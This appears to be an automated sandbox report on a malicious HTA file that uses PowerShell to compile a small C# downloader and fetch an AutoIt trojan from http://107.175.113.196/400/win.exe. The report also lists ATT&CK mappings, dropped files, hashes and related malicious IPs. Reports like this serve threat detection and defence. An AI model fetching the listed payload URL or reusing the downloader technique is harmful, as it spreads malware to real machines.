Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\winnit.exe

Code function: 6_2_00AE4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

6_2_00AE4E87

Source: C:\Users\user\AppData\Roaming\winnit.exe

Code function: 6_2_00AF1E06 GetUserNameW,

6_2_00AF1E06

Source: C:\Users\user\AppData\Roaming\winnit.exe

Code function: 6_2_00AE3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

6_2_00AE3F3A

Source: C:\Users\user\AppData\Roaming\winnit.exe

Code function: 6_2_00AB49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

6_2_00AB49A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match	File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2350161997.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2350750527.0000000003950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: winnit.exe	Binary or memory string: WIN_81
Source: winnit.exe	Binary or memory string: WIN_XP
Source: winnit.exe	Binary or memory string: WIN_XPe
Source: winnit.exe	Binary or memory string: WIN_VISTA
Source: winnit.exe	Binary or memory string: WIN_7
Source: winnit.exe	Binary or memory string: WIN_8
Source: winnit.exe.3.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Source: Yara match	File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2350161997.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2350750527.0000000003950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00B26283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		6_2_00B26283
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00B26747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		6_2_00B26747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	21 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	11 Command and Scripting Interpreter	2 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Email Collection	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	3 PowerShell	Logon Script (Windows)	2 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	21 Input Capture	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	127 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	21 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	1 Masquerading	LSA Secrets	351 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Valid Accounts	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	212 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
seemejkiss.hta	16%	ReversingLabs	Script-WScript.Trojan.Asthma

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\win[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\winnit.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\win[1].exe	58%	ReversingLabs	Win32.Trojan.AutoitInject
C:\Users\user\AppData\Roaming\winnit.exe	58%	ReversingLabs	Win32.Trojan.AutoitInject

Source	Detection	Scanner	Label
http://107.175.113.196/400/win.exeV	0%	Avira URL Cloud	safe
http://107.175.113.196/400/win.e	0%	Avira URL Cloud	safe
http://107.175.113.196/400/win.exe	100%	Avira URL Cloud	malware

Name	Malicious	Antivirus Detection	Reputation
http://107.175.113.196/400/win.exe	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000003.00000002.2182576683.000000000612A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000003.00000002.2180711036.0000000005218000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000003.00000002.2180711036.0000000005218000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000003.00000002.2180711036.0000000005218000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000003.00000002.2180711036.00000000050C1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://107.175.113.196/400/win.exeV	powershell.exe, 00000003.00000002.2187215317.0000000008892000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000003.00000002.2180711036.0000000005218000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000003.00000002.2180711036.0000000005218000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000003.00000002.2182576683.000000000612A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000003.00000002.2182576683.000000000612A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000003.00000002.2182576683.000000000612A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000003.00000002.2182576683.000000000612A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://107.175.113.196/400/win.e	powershell.exe, 00000003.00000002.2180711036.00000000054E4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000003.00000002.2180711036.00000000050C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000003.00000002.2180711036.0000000005218000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
107.175.113.196	unknown	United States		36352	AS-COLOCROSSINGUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1570657
Start date and time:	2024-12-07 15:46:41 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	seemejkiss.hta
Detection:	MAL
Classification:	mal100.phis.troj.expl.evad.winHTA@14/15@0/1
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 98% Number of executed functions: 59 Number of non-executed functions: 272
Cookbook Comments:	Found application associated with file extension: .hta

Warnings

Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target mshta.exe, PID 5804 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: seemejkiss.hta

Simulations

Behavior and APIs

Time	Type	Description
09:47:40	API Interceptor	41x Sleep call for process: powershell.exe modified
09:48:05	API Interceptor	3x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
107.175.113.196	container payment.xls	Get hash	malicious	Unknown	Browse	107.175.113.196/xampp/nc/keepthebesthingsentiretimewhichgivenmebesthignsinthewayof.hta
	container payment.xls	Get hash	malicious	Unknown	Browse	107.175.113.196/xampp/nc/keepthebesthingsentiretimewhichgivenmebesthignsinthewayof.hta
	container payment.xls	Get hash	malicious	Unknown	Browse	107.175.113.196/xampp/nc/keepthebesthingsentiretimewhichgivenmebesthignsinthewayof.hta

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-COLOCROSSINGUS	seemybestdayguvenu.hta	Get hash	malicious	Cobalt Strike, FormBook, HTMLPhisher	Browse	172.245.123.29
	k4PAIh16E6.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	192.3.118.10
	scan_241205-801_draft_PO.exe	Get hash	malicious	Remcos, GuLoader	Browse	104.168.7.16
	Transferencia de pago.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	192.3.243.136
	LdSbZG1iH6.exe	Get hash	malicious	Remcos, PureLog Stealer	Browse	192.3.64.152
	maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.hta	Get hash	malicious	Cobalt Strike, FormBook, HTMLPhisher	Browse	172.245.123.3
	Document.xla.xlsx	Get hash	malicious	FormBook, HTMLPhisher	Browse	107.172.44.175
	bestimylover.hta	Get hash	malicious	Cobalt Strike, FormBook, HTMLPhisher	Browse	107.172.44.175
	nicpeoplesideasgivenforme.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher	Browse	198.46.178.192
	dgreatth.doc	Get hash	malicious	Unknown	Browse	192.3.95.197

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1213440
Entropy (8bit):	7.196631562868526
Encrypted:	false
SSDEEP:	24576:au6J33O0c+JY5UZ+XC0kGso6FazP6Qvmikfo2WY:su0c++OCvkGs9FazSQvfkfEY
MD5:	A97987DF137D1328F00AA6B81EBA4957
SHA1:	86D668C195909AE6A772B98EB59868D5B60D3195
SHA-256:	771CBB08F711A9AFB6EAA9846D0300C4828230B346FD41714B5B67A8B0BDCA62
SHA-512:	1E050E138C1255C76B1BE2035CC4FE68A1054693C027C1E569D80DE9326675B8E843E00E56A677435708913C0F2A8C4EA6A2217D8CC2DDCE030B3FBA6503E170
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 58%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L.....Pg.........."..................}............@..................................B....@...@.......@.....................L...\|....p.......................p...q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc........p......................@..@.reloc...q...p...r..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1328
Entropy (8bit):	5.403946642126862
Encrypted:	false
SSDEEP:	24:3K2WSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NK3R8UHr8Htq:bWSU4y4RQmFoUeWmfmZ9tK8NWR8Wz
MD5:	BE0263F1A9334B6257580C52000B98C0
SHA1:	667C7881C40E5A0971A927A8229805B9A7460C85
SHA-256:	D6F1DEE9D55BC9E3DB9B222C32181C38602D63C0FEEE93709934880878FF33B0
SHA-512:	9A68674728A6CAC3FF303075385D8E2F63DBE1A3080BE8B21E7A0898DA448F299C70D6D0A73DB6DCBF364A36F8FAF80784C0F0C9A5F091948F6CB05E23386382
Malicious:	false
Reputation:	low
Preview:	@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\5zyziwbf\5zyziwbf.0.cs

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (361)
Category:	dropped
Size (bytes):	483
Entropy (8bit):	3.9197915405630686
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuAHrygukPMmn/RQXReKJ8SRHy4Hd4lWvn5b/oi0Qy:V/DTLDfuAHmkmXfHp9joTQy
MD5:	D090B1939F86E8895BABE2930BE60273
SHA1:	425EB2BEB83C6CF9C7941163C4449E82A118D131
SHA-256:	AB5857CF3E0C941EC270C15A80BB45B305D014A7ADF15F1EFED23084DBC327F2
SHA-512:	78BD2D157F55029609311B8D7F1D5126DA33041C7FCEEB8CCBA64199D5FB3B44BB358235E326FC06123F0A9243A11FBBBCE423716CCD28FDC01BD90CC8461FED
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace wsAMKNbp.{. public class HfUHbfEKEB. {. [DllImport("UrlmoN", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr CCcbOVb,string vvBKRW,string pbMCfNtxp,uint CqPigTHBJ,IntPtr BtRfncu);.. }..}.

C:\Users\user\AppData\Local\Temp\5zyziwbf\5zyziwbf.cmdline

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
Category:	dropped
Size (bytes):	371
Entropy (8bit):	5.242307038044083
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fASHizxs7+AEszI923fASHJyAn:p37Lvkmb6Kzo/WZE2owyA
MD5:	CC7EFB33E377031F1E562CA063AE4566
SHA1:	4E5E76E7D48AEFA0CF4DAA1682B8A0B097A5ED69
SHA-256:	EFB9DE329459E268C29D45672CFC1ACB3CB9FAAD785A13B7914B39AB63BE9D92
SHA-512:	92F0D4B46D649F39AD53E7A36639311BFA6A5E6E7BFE5AAAF65C167B1D1B515E14F46C82BD354F43B5DFAB08A6374A075853D8FAF3E6D9E1B6529D2E91C8E73F
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\5zyziwbf\5zyziwbf.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\5zyziwbf\5zyziwbf.0.cs"

C:\Users\user\AppData\Local\Temp\5zyziwbf\5zyziwbf.dll

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.871739546474508
Encrypted:	false
SSDEEP:	24:etGS5p2YYnl8emWkrzMtBttkZfWjd8cq4lWI+ycuZhNWTakSJ8PNnq:6SY8+emPzMtBoJWjdTqF1ulWTa3Jsq
MD5:	F8154F9CB34DD5811F361BC147AF080B
SHA1:	644E57EA3D5D96133F396A95F56756B857506A6B
SHA-256:	743FEBAC1F40AECD006E7F4BA789E3BFABD7130EBB84D2A8EC4B7E0F04EB322E
SHA-512:	9E90249370471742E7825F345B673ECECB604B510DC10C4469229499B1ED35A9419123626C0D51B3813EE9A6AC7370EBBBAD42C61886E4B2AC4E870FD77B704F
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....{Tg...........!.................#... ...@....... ....................................@.................................h#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....BSJB............v4.0.30319......l.......#~......(...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................;.4.......................................".............. B.....P ......T.........Z.....b.....i.....s.....}...T.....T...!.T.....T.......!............B.......................................+..........<Module>.5z

C:\Users\user\AppData\Local\Temp\5zyziwbf\5zyziwbf.out

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (449), with CRLF, CR line terminators
Category:	modified
Size (bytes):	870
Entropy (8bit):	5.321518427554718
Encrypted:	false
SSDEEP:	24:KMoqd3ka6Kzo8E2o51Kax5DqBVKVrdFAMBJTH:doika6apE2K1K2DcVKdBJj
MD5:	59F01C7222AFE58FBAE760EAAE8D9FC0
SHA1:	F52CD8C5B984A2B376CF7334CF6887332D8954BB
SHA-256:	DC597DBECF53831425A7C398412E9ADA2FA9051718610DB9894E28B2A48B316D
SHA-512:	6B1681283B119EC2EBC5F9AF69D0274526B77E981C32766D337FE76146F6BCDEBDB0D9364B1B7E6A92F1220419360C5E7BED6B9FE180249114680E322F93A22F
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\5zyziwbf\5zyziwbf.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\5zyziwbf\5zyziwbf.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\5zyziwbf\CSCADB73B4CC47C40A8804A92B1B0BD1E62.TMP

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1131735529739997
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryYTak7YnqqJ8PN5Dlq5J:+RI+ycuZhNWTakSJ8PNnqX
MD5:	39C2CE165A11D737ADF94365445425F1
SHA1:	644C991C26D33761B37FAC8BC63D7B1022F3CF2F
SHA-256:	368E1FB316BB07AC5AB9A5F295DA7E9E93866207C2ECB497CF77FFD3C940F425
SHA-512:	F0318641A1FB1E0851B5DED9CC45BDF5962DECB0820621AF1C4DB4665314ED85EDEC4D6A33DA8C230B50974D76224546E9C7D5F4F44A0FCC8DF0B43C71915148
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...5.z.y.z.i.w.b.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...5.z.y.z.i.w.b.f...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\Glagolitic

Process:	C:\Users\user\AppData\Roaming\winnit.exe
File Type:	data
Category:	dropped
Size (bytes):	289792
Entropy (8bit):	7.994669403497686
Encrypted:	true
SSDEEP:	6144:YEAaD0qK6K1SXPom559fNG9z+HsfcyfoSnPj+J:YE3BK1S/VL908HsUdSb+J
MD5:	63F3BA228146413B60B4C3036F6CC6E9
SHA1:	7558EB9BEAB56D2C5178B537E10FB6CA2A309EDA
